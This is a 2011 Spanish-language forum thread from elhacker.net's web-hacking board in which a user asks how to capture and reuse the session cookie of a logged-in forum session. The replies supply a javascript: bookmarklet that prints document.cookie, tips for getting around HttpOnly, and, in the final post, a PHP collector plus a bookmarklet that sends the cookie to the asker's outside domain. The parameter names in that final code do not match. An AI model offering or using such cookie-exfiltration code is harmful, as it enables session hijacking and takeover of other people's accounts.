Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Bugs y Exploits => Hacking => Nivel Web => Mensaje iniciado por: WaAYa HaCK en 16 Julio 2011, 17:24 PM

Título: Conseguir cookies estando ya autenticado
Publicado por: WaAYa HaCK en 16 Julio 2011, 17:24 PM
Hola! Mi caso es el siguiente:

Un día subo la pantalla de mi portátil, veo que está encendido... qué raro... ¡Anda, si me dejé otra sesión abierta en un foro!

Mi pregunta es: teniendo ya la página abierta e identificado como usuario legítimo, cómo puedo hacer para capturar la cookie? ¿Y después, cómo la puedo utilizar?

Tengo un dominio waaya.herobo.com (http://waaya.herobo.com): en él hay un archivo cookie.php que guarda cookies en cookies.txt .

Saludos!
Título: Re: Conseguir cookies estando ya autenticado
Publicado por: Azielito en 1 Agosto 2011, 20:12 PM
en la barra de direcciones pones
javascript:prompt('',document.cookie);void(0);

y ya, seleccionas, copias y pegas =D

el problema es cuando no te guarda la sesion en la cookie sino de otra forma =P
Título: Re: Conseguir cookies estando ya autenticado
Publicado por: Ambr0si0 en 2 Agosto 2011, 01:13 AM
Cita de: Azielito en  1 Agosto 2011, 20:12 PM
en la barra de direcciones pones
javascript:prompt('',document.cookie);void(0);

y ya, seleccionas, copias y pegas =D

el problema es cuando no te guarda la sesion en la cookie sino de otra forma =P

Si la cookie tiene el parametro HTTP ONLY no te imprimirá la cookie.
En este caso no tienes mas que ver donde guardan las cookies tu navegador.
O más simple hay muchas extensiones (al menos en firefox) donde puedes consultar estos valores. CookieManager+
Título: Re: Conseguir cookies estando ya autenticado
Publicado por: WaAYa HaCK en 2 Agosto 2011, 03:25 AM
Ok, voy a probar. A ver si puedo entender de una vez todo el mundo de las cookies  :P

Gracias!
Título: Re: Conseguir cookies estando ya autenticado
Publicado por: [u]nsigned en 12 Agosto 2011, 18:28 PM
Seria ams facil asi:

Tu archivo http://waaya.herobo.com/cookie.php deberia tener esto:

Código (php) [Seleccionar]
<?php
echo urldecode($_GET['c']);
?>


Entonces en la barra de direcciones  del navegador pegar esto:

Código (javascript) [Seleccionar]
javascript:location.href="http://waaya.herobo.com/cookie.php?q="+document.cookie;

Te doy una idea, no el ejemplo completo... :¬¬

Saludos